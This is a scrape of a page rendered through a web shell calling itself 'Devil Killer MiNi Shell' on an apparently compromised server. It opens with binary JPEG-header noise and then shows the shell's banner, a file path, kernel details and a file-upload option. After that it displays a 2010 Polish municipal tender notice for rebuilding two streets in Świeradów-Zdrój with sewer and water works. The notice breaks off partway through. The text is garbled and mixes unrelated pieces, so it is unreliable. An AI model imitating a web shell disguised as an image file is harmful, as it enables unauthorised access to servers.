JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100202/29894-N-2010.html

<p class="kh_header"><b>Świeradów-Zdrój: Przebudowa  ulicy Wczasowej i  Sienkiewicza w Świeradowie-Zdroju wraz z infrastrukturą realizowana w ramach  :
1. projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju,
2. zadania  pn. Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa,
3. zadania  pn.Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopi</b><br>
<b>Numer ogłoszenia: 29894 - 2010; data zamieszczenia: 02.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa  ulicy Wczasowej i  Sienkiewicza w Świeradowie-Zdroju wraz z infrastrukturą realizowana w ramach  :
1. projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju,
2. zadania  pn. Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa,
3. zadania  pn.Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopi.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Część I - Przebudowa ul. Wczasowej wraz z infrastrukturą
Zadanie nr 1 Przebudowa  ul. Wczasowej - ok. 306,30 m, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o śr. 315mm o długości ok. 184,00m, o śr. 250mm o długości ok. 31,00m, przykanaliki o śr. 200mm o długości ok. 41,10m) 
realizowana w ramach projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju
Zadanie nr 2. Budowa kanalizacji sanitarnej w ul. Wczasowej - kanał główny o śr. 200mm o długości ok. 358,00m, przykanaliki o śr. 160mm o długości ok. 29,00m
realizowana w ramach zadania :  Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa
Zadanie nr 3. Budowa sieci wodociągowej w ul. Wczasowej :
- o śr. 160mm o długości ok. 179,00m
- o śr. 110mm o długości ok. 234,50m
- o śr. 90mm o długości ok. 7,00m
- o śr. 63mm o długości ok. 42,50m
- o śr. 40mm o długości ok. 22,50m
realizowana w ramach zadania :  Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopiańska i Strażacka

Część II - Przebudowa ul. Sienkiewicza wraz z infrastrukturą
Zadanie nr 1. Przebudowa  ul. Sienkiewicza - ok. 340,20 m, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 120,00m, słupy oświetleniowe - 3 kpl, kanalizacja deszczowa - kanał główny o śr. 400mm o długości ok. 183,00m, kanał główny o śr. 315mm o długości ok. 171,00m, kanał główny o śr. 250mm o długości ok. 17,50m, przykanaliki o śr. 200mm o długości ok. 113,50m) 
realizowana w ramach projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju
Zadanie nr 2 . Budowa kanalizacji sanitarnej w ul. Sienkiewicza - kanał główny o śr. 200mm o długości ok. 318,50m, przykanaliki o śr. 160mm o długości ok. 17,50m
realizowana w ramach zadania :  Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa
Zadanie nr 3. Budowa sieci wodociągowej w ul. Sienkiewicza :
- o śr. 200mm o długości ok. 337,50m,  
- o śr. 160mm o długości ok. 16,00m
- o śr. 125mm o długości ok. 2,50m
- o śr. 90mm o długości ok. 37,50m
- o śr. 63mm o długości ok. 29,00m
- o śr. 40mm o długości ok. 7,50m
realizowana w ramach zadania :  Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br. Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopiańska i Strażacka

2. Roboty budowlane winny być wykonane zgodnie z zamieszczoną dokumentacją  projektową, z zastrzeżeniem  następujących zmian i uzupełnień , które należy uwzględnić w cenie ofertowej : 
a) zastosować należy krawężniki oraz obrzeża kamienne zgodnie z przedmiarem robót,
b) w ulicy Sienkiewicza :
- odstępuje się od frezowania nawierzchni asfaltowej na powierzchni około 1254,00m2
- należy przyjąć korytowanie mechaniczne, głębokości do 20cm na całej szerokości jezdni, w gruntach kat. II-IV na całej powierzchni jezdni i chodników - około 2081,00m2
- roboty nawierzchniowe - należy przyjąć całą powierzchnię jezdni - około 2081,00m2 - profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, podbudowa z kruszywa łamanego grubość warstwy po zagęszczeniu 20cm,  
- przy zasypywaniu wykopów po wykonaniu infrastruktury, należy przyjąć wymianę gruntu oraz koszty wymiany gruntu w  ilości minimum 50% objętości wykopów , 
c) W ulicy Wczasowej :
- odstępuje się od frezowania nawierzchni asfaltowej na powierzchni około 80,00m2
- należy przyjąć korytowanie mechaniczne, głębokości do 20cm na całej szerokości jezdni, w gruntach kat. II-IV na całej powierzchni jezdni i chodników - około 1465,00m2
- roboty nawierzchniowe - należy przyjąć całą powierzchnię jezdni - około 1465,00m2 - profilowanie i zagęszczenie podłoża pod warstwy konstrukcyjne nawierzchni, podbudowa z kruszywa łamanego grubość warstwy po zagęszczeniu 20cm,  
- przy zasypywaniu wykopów po wykonaniu infrastruktury, należy przyjąć wymianę gruntu oraz koszty wymiany gruntu w  ilości minimum 50% objętości wykopów,
d)  należy  przyjąć koszty obsługi geodezyjnej oraz inwentaryzacji  geodezyjnej powykonawczej, koszty utylizacji nawierzchni asfaltowej.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych o wartości do 10% zamówienia podstawowego, polegających na powtórzeniu zamówienia tego samego rodzaju  .</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.10.00-5, 45.23.20.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium. 
Część I w wysokości  27 000,00 zł(słownie:  dwadzieścia  siedem tysięcy złotych),
Część II w wysokości 40 000,00 zł (słownie: czterdzieści tysięcy złotych )</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art.24 ustawy PZP. W celu potwierdzenia, że Wykonawca spełnia warunek
 nr 1 należy przedłożyć
Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych.
W celu potwierdzenia, że Wykonawca spełnia warunek
 nr 2 należy przedłożyć
Oświadczenie o spełnianiu warunków określonych w art. 24 ustawy Prawo Zamówień Publicznych.
W celu potwierdzenia, że Wykonawca spełnia warunek
 nr 3 należy przedłożyć
Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
Wykonawca spełnia warunek
 nr 4 
jeżeli przedłoży  
Aktualne zaświadczenia właściwego naczelnika Urzędu Skarbowego potwierdzające , że wykonawca nie zalega z opłacaniem podatków,  lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
Wykonawca spełnia warunek
 nr 5
jeżeli przedłoży  
Aktualne zaświadczenia właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające , że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i  społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest, by  Wykonawca  wykonał 
jedną  robotę budowlaną ( jedno zadanie) obejmujące budowę lub przebudowę konstrukcji drogi oraz jej nawierzchni bitumicznej o długości minimum 250 mb 
wraz  z  budowę sieci kanalizacyjnych lub budową sieci wodociągowych
 o długości minimum 200 mb . Wykonawca spełni warunek nr 6a
 jeżeli przedłoży wykaz  zgodne ze wzorem stanowiącym załącznik nr  
4 do SIWZ wraz  
 referencjami
 wystawionymi 
przez odbiorcę robót.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymmagane jest, by  Wykonawca dysponował osobami posiadającymi następujące kwalifikacje i uprawnienia:

1) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności  drogowej w ograniczonym 
zakresie,

2) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń

3) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń;

1-3)członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa. Wykonawca 



spełni warunek
 nr 6 b jeżeli przedłoży wykaz zgodne ze wzorem stanowiącym załącznik nr  
5 do SIWZ.
 i 
przedłoży  oświadczenie   zgodne ze wzorem stanowiącym załącznik   nr 6 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zmiany  przedmiotu umowy ,umówionego terminu wykonania zamówienia  lub wysokości wynagrodzenia mogą  nastąpić w przypadku wystąpienia jednej z poniższych okoliczności:
a)ograniczenia zakresu prac, w tym robót budowlanych, wynikających z braku środków finansowych, 
b)konieczności zmiany terminu realizacji umowy na roboty budowlane, w przypadku wystąpienia tzw. siły wyższej, tj. przez siłę wyższą  należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od Wykonawcy i Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Wykonawca i Zamawiający  nie mogli przewidzieć i którym  nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych. Wykonawca  jest zobowiązany niezwłocznie poinformować w formie pisemnej Zamawiającego  o fakcie wystąpienia siły wyższej , udowodnić te okoliczności poprzez przedstawienie dokumentacji potwierdzającej wystąpienie zdarzeń mających cechy siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie  to miało na przebieg realizacji zamówienia ,
c) z przyczyn leżących po stronie Zamawiającego, wynikających ze zmiany stosunków społeczno-gospodarczych lub z innych powodów wystąpi konieczność zmiany terminu, zakresu, bądź innych zapisów, bez zmiany których realizacja umowy będzie utrudniona, niemożliwa lub narazi Zamawiającego na szkodę,
d)zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa,
e) w przypadku zaistnienia niesprzyjających i nietypowych warunków atmosferycznych dla okresu i miejsca wykonywanych robót, potwierdzonych wpisem do dziennika budowy, odbiegających od wymagań STWiORB.,
f) z powodu istotnych braków lub błędów w dokumentacji projektowej, również tych polegających na niezgodności dokumentacji z przepisami prawa,
g) z powodu uzasadnionych zamian w zakresie sposobu wykonania przedmiotu zamówienia proponowanych przez  Zamawiającego lub Wykonawcę, jeżeli zmiany te są  korzystne dla  Zmawiającego,
h) z powodu wystąpienia robót dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę robót budowlanych,
i)  z powodu wystąpienia robót dodatkowych , których  nie można prowadzić łącznie z robotami podstawowymi ,j) z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją  winy którejkolwiek ze stron</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um-swieradow.bip.pbox.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój pokój 21a..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.02.2010 godzina 12:00, miejsce: Urząd Miasta Świeradów-Zdrój ul. 11- Listopada 35 Świeradów-Zdrój sekretariat 1d.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany przez Unię Europejską środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007-2013 Fundusze Europejskie - dla rozwoju Dolnego Śląska..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Przebudowa ul. Wczasowej wraz z infrastrukturą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 Przebudowa  ul. Wczasowej - ok. 306,30 m, wraz z infrastrukturą (kanalizacja deszczowa - kanał główny o śr. 315mm o długości ok. 184,00m, o śr. 250mm o długości ok. 31,00m, przykanaliki o śr. 200mm o długości ok. 41,10m) 
realizowana w ramach projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju
Zadanie nr 2. Budowa kanalizacji sanitarnej w ul. Wczasowej - kanał główny o śr. 200mm o długości ok. 358,00m, przykanaliki o śr. 160mm o długości ok. 29,00m
realizowana w ramach zadania :  Budowa kanalizacji sanitarnej i deszczowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Ratowników Górskich, Stokowa, Budowlanych, Krótka, Wczasowa, Willowa
Zadanie nr 3. Budowa sieci wodociągowej w ul. Wczasowej :
- o śr. 160mm o długości ok. 179,00m
- o śr. 110mm o długości ok. 234,50m
- o śr. 90mm o długości ok. 7,00m
- o śr. 63mm o długości ok. 42,50m
- o śr. 40mm o długości ok. 22,50m
realizowana w ramach zadania :  Budowa sieci wodociągowej w ulicach: Sienkiewicza, Strumykowa, Źródlana, Br.Czecha, Asnyka, Krótka, Wczasowa, Willowa, Zakopiańska i Strażacka.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.10.00-5, 45.23.20.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Przebudowa ul. Sienkiewicza wraz z infrastrukturą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1. Przebudowa  ul. Sienkiewicza - ok. 340,20 m, wraz z infrastrukturą (oświetlenie uliczne - kabel oświetleniowy o długości ok. 120,00m, słupy oświetleniowe - 3 kpl, kanalizacja deszczowa - kanał główny o śr. 400mm o długości ok. 183,00m, kanał główny o śr. 315mm o długości ok. 171,00m, kanał główny o śr. 250mm o długości ok. 17,50m, przykanaliki o śr. 200mm o długości ok. 113,50m) 
realizowana w ramach projektu pn.: Poprawa infrastruktury drogowej mającej na celu ułatwienie dostępności do infrastruktury turystycznej w Świeradowie-Zdroju
Zadanie nr 2 . Budowa kanalizacji sanitarnej w ul. Sienkiewicza - kanał główny o śr. 200mm o długości ok. 318,50m, przykanaliki o śr. 160mm o długości ok. 17,50m
